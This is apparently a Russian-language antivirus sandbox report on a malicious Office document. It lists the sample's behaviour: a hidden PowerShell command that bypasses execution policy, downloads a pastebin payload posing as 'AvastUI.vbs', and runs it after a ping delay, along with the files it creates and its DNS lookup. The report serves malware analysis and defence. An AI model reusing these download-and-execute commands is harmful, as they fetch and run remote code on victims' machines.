Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- https://pastebin.com/raw/ntkwkw4i как c:\users\public\avastui.vbs
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AvastUI.vbs
Изменения в файловой системе
Создает следующие файлы
- nul
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.word\~wrf{fea3dff2-c3ef-4f3b-9146-f6ffba2d3d53}.tmp
Сетевая активность
UDP
- DNS ASK pa###bin.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/NTkwkW4i','C:\Users\Public\AvastUI.vbs')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AvastUI.vbs' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
